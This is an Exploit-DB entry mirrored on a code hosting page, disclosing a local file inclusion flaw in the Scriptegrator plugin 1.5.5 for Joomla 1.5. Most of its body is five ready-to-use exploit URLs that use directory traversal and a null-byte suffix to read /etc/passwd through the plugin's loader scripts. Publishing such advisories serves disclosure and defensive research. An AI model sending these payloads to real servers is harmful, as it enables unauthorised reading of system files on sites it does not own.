bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/17394.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

25 lines
No EOL
1.3 KiB
Text
Raw Permalink Blame History

# Exploit Title: Scriptegrator plugin for Joomla! 1.5 0day File Inclusion
# Originally Reported: Early 2011
# Independently Discovered: 20 April 2011
# Released: 13 June 2011
# Author: jdc
# Software Link: http://www.greatjoomla.com/extensions/plugins/core-design-scriptegrator-plugin.html
# Version: 1.5.5
``````````````````````````````````````````````````````````````````````````
It looks like this one was reported as in-use by someone else sometime around February (?) 2011:
* http://www.greatjoomla.com/index.php?option=com_kunena&Itemid=171&func=view&catid=32&id=6310
Local File Inclusion
====================
http://[target]/plugins/system/cdscriptegrator/libraries/highslide/css/cssloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.css
http://[target]/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.js
http://[target]/plugins/system/cdscriptegrator/libraries/jquery/theme/cssloader.php?file=../../../../../../../../../../../../etc/passwd%00.css
http://[target]/plugins/system/cdscriptegrator/libraries/jquery/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.js
http://[target]/plugins/system/cdscriptegrator/libraries/jquery/js/ui/jsloader.php?file=../../../../../../../../../../../../etc/passwd%00.js
Reference in a new issue View git blame Copy permalink